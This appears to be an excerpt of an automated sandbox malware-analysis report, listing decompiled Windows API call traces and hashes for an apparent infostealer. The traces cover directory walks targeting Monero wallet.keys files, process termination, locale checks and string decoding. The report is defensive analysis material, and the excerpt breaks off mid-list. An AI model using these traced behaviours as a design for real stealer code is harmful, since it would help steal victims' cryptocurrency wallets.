                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 8cbb77e3ad1f6c2e4b3be282afe21d27729c4063bc99b69703951e7bd3aeecf7
                          • Instruction ID: 94c96a3a7903e35058fac25882a45c7e3ad02e1e3e46fa14528f97e600edaa8d
                          • Opcode Fuzzy Hash: 8cbb77e3ad1f6c2e4b3be282afe21d27729c4063bc99b69703951e7bd3aeecf7
                          • Instruction Fuzzy Hash: D312DE71A101189BCB16FB60DCA6EEEB37DAF55300F4045E9B54A66093EF306B89CF61
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00040C32), ref: 0002DF5E
                          • StrCmpCA.SHLWAPI(?,000415C0), ref: 0002DFAE
                          • StrCmpCA.SHLWAPI(?,000415C4), ref: 0002DFC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002E4E0
                          • FindClose.KERNEL32(000000FF), ref: 0002E4F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: dd99e68f70d7666350094b9ca34fda43f42a9d55800b60ed8e427b01f6c0a981
                          • Instruction ID: 3cbdfb85ade254c72208b9cc4d6955c3246a7bc0970d0cee26379d8d5dca697a
                          • Opcode Fuzzy Hash: dd99e68f70d7666350094b9ca34fda43f42a9d55800b60ed8e427b01f6c0a981
                          • Instruction Fuzzy Hash: 24F1CF71A241189ACB16FB60DDA5EEEB33DAF15300F4055E9B14A62093EF306F89CF65
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000415A8,00040BAF), ref: 0002DBEB
                          • StrCmpCA.SHLWAPI(?,000415AC), ref: 0002DC33
                          • StrCmpCA.SHLWAPI(?,000415B0), ref: 0002DC49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002DECC
                          • FindClose.KERNEL32(000000FF), ref: 0002DEDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 04e2fc008f77d44e75f9b9da6834ac63f2c426ddbffe28bddd55882f66fa8b14
                          • Instruction ID: 65133f8cee04d3cb2192b4a33f5b74c2662818cc3e4d1d226680b1a25747f512
                          • Opcode Fuzzy Hash: 04e2fc008f77d44e75f9b9da6834ac63f2c426ddbffe28bddd55882f66fa8b14
                          • Instruction Fuzzy Hash: 52913273B001149BCB15FB70ED969ED737DAF95340F0086A9F94A56182EF349B48CBA2
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00039905
                          • Process32First.KERNEL32(00029FDE,00000128), ref: 00039919
                          • Process32Next.KERNEL32(00029FDE,00000128), ref: 0003992E
                          • StrCmpCA.SHLWAPI(?,00029FDE), ref: 00039943
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0003995C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0003997A
                          • CloseHandle.KERNEL32(00000000), ref: 00039987
                          • CloseHandle.KERNEL32(00029FDE), ref: 00039993
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 2696918072-0
                          • Opcode ID: aed9762694b037937d2e6f32f31a8d02959e733a57be92e5e68a1a987242e8e9
                          • Instruction ID: 04122aead7c92f5777d92ae29f3f5fc9545c9cac41e3b7e8f5737f2e675b78ba
                          • Opcode Fuzzy Hash: aed9762694b037937d2e6f32f31a8d02959e733a57be92e5e68a1a987242e8e9
                          • Instruction Fuzzy Hash: 2F112E75A04208ABDB64DFA4EC4CBEEB7BCBB49740F00459DF509A6240DB749B84CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %_^$*87w$,;]q$-(~$en/]$r:?w$l|{$}[u
                          • API String ID: 0-424456402
                          • Opcode ID: 89b09f88e5333a552dda23fd5834601c76560a85ab8bb514a9ecb3f4e60d3b2c
                          • Instruction ID: 1a6d52af1695a86e631c3d6e4e7fdb40b14818063f85fc4399bdfc34e6b6bef1
                          • Opcode Fuzzy Hash: 89b09f88e5333a552dda23fd5834601c76560a85ab8bb514a9ecb3f4e60d3b2c
                          • Instruction Fuzzy Hash: 04B22AF360C2049FE304AE2DEC8567AFBD9EF94720F1A493DE6C4C3744EA7598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6mN$G7]n$Ux{}$h+m!$h{qB$vm!$~-j$W}}
                          • API String ID: 0-130775809
                          • Opcode ID: 793e99bdee4671d16b661110e4ef9d30d3b91a44d1f8c0b0de64c0ee709dae6c
                          • Instruction ID: 431b312a76e7d3d468463d68ef3ca13c99b7892839dcf9498153467205600332
                          • Opcode Fuzzy Hash: 793e99bdee4671d16b661110e4ef9d30d3b91a44d1f8c0b0de64c0ee709dae6c
                          • Instruction Fuzzy Hash: 5EB207F360C214AFE304AE29EC8567ABBE9EF94720F16453DEAC4C7740EA3558058797
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • GetKeyboardLayoutList.USER32(00000000,00000000,000405B7), ref: 00037D71
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00037D89
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00037D9D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00037DF2
                          • LocalFree.KERNEL32(00000000), ref: 00037EB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 276e8fa5974870453f35f22c4ba572feae07ac3ae5b2c0d84ae447ae9d50bfa1
                          • Instruction ID: 5fac614eae0de81ed0000f51abd5048c818631a9fc90fb2e276a18d9e6961b76
                          • Opcode Fuzzy Hash: 276e8fa5974870453f35f22c4ba572feae07ac3ae5b2c0d84ae447ae9d50bfa1
                          • Instruction Fuzzy Hash: C44140B1944218ABCB25DB94DC99FEEB778FF48700F1041D9E10A66291DB746F84CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2}$H{{|$KA_$\y8l$vtKM$wP~t$z?^
                          • API String ID: 0-1400557582
                          • Opcode ID: 9bc5b791cd74fb94a8c2a704142d12483a7bdc023a3dad85002a1a4c22099f2a
                          • Instruction ID: 32dadb5e21f3bdc083d63344d7f8be8e3c6b47230bd62940511f2311222d43aa
                          • Opcode Fuzzy Hash: 9bc5b791cd74fb94a8c2a704142d12483a7bdc023a3dad85002a1a4c22099f2a
                          • Instruction Fuzzy Hash: D2B207F360C2049FE304AE2DEC8577ABBE5EF94720F1A893DE6C4C7744E63598058696
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00040D79), ref: 0002E5A2
                          • StrCmpCA.SHLWAPI(?,000415F0), ref: 0002E5F2
                          • StrCmpCA.SHLWAPI(?,000415F4), ref: 0002E608
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002ECDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: a18b722249d9be3cb8a0f78511314e1b6862073cfff78967b2409d20e1e97828
                          • Instruction ID: 00ad15c96cb2727376a3e0763bc96529a6b269b21e68a5f19e0c498957c0b5a6
                          • Opcode Fuzzy Hash: a18b722249d9be3cb8a0f78511314e1b6862073cfff78967b2409d20e1e97828
                          • Instruction Fuzzy Hash: 8E12FD72B101189BCB16FB60DDA6EEDB37DAF55300F4045E9B54A66093EF306B48CB62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *g$+{6o$D.o$ik>$p5}
                          • API String ID: 0-4206149274
                          • Opcode ID: 0c13b1d4afbaa83e87e92f27e390631f6847286e67fff0bcb0d9d341d8332abf
                          • Instruction ID: 78db3eeebbc8cede7880f2bcdb4831faac66dd6856d28f88e30bb7878662ddd6
                          • Opcode Fuzzy Hash: 0c13b1d4afbaa83e87e92f27e390631f6847286e67fff0bcb0d9d341d8332abf
                          • Instruction Fuzzy Hash: B7A24BF3A0C2149FE304AE2DEC8567ABBD9EF94760F16453EEAC4C3744E9359C018696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: \u$\u${${$}$}
                          • API String ID: 0-582841131
                          • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                          • Instruction ID: 82752fb20417fd694dd725c334fb86fcf7da00d6acd05cc642a585e35444f2d9
                          • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                          • Instruction Fuzzy Hash: A6417012E19BDAC5CB058B7484A02BEBFB27FD6210F6D42AAC4DD5F382C774414AD3A5
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0002C971
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0002C97C
                          • lstrcat.KERNEL32(?,00040B47), ref: 0002CA43
                          • lstrcat.KERNEL32(?,00040B4B), ref: 0002CA57
                          • lstrcat.KERNEL32(?,00040B4E), ref: 0002CA78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
